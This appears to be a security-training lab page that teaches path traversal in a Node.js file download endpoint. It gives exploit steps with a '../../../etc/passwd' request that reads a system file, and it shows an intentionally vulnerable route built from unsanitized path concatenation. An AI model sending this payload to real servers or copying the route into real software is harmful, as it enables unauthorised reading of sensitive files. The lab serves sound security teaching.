Search labs…⌘K
Dashboard/Broken Access Control/Path Traversal in File Download

Path Traversal in File Download

Easy
#path-traversal
#owasp-a01
#file-access

Overview

This lab demonstrates how unsanitized file path parameters can allow attackers to read arbitrary files from the server filesystem.

Scenario

The application provides a file download feature at `/api/download?file=report.pdf`. The file parameter is directly concatenated with the base directory path.

Exploit Steps

  1. 01Request a legitimate file: GET /api/download?file=report.pdf
  2. 02Modify the file parameter: GET /api/download?file=../../../etc/passwd
  3. 03Observe that the server returns the contents of /etc/passwd
routes/download.js
// Vulnerable — unsanitized file path
app.get('/api/download', authenticate, (req, res) => {
  const filename = req.query.file;
  
  // ❌ Direct concatenation allows traversal
  const filepath = path.join('/app/uploads/', filename);
  res.sendFile(filepath);
});

This code contains a known vulnerability. Never deploy code like this in production. Use the Secure Mode toggle to see the remediation.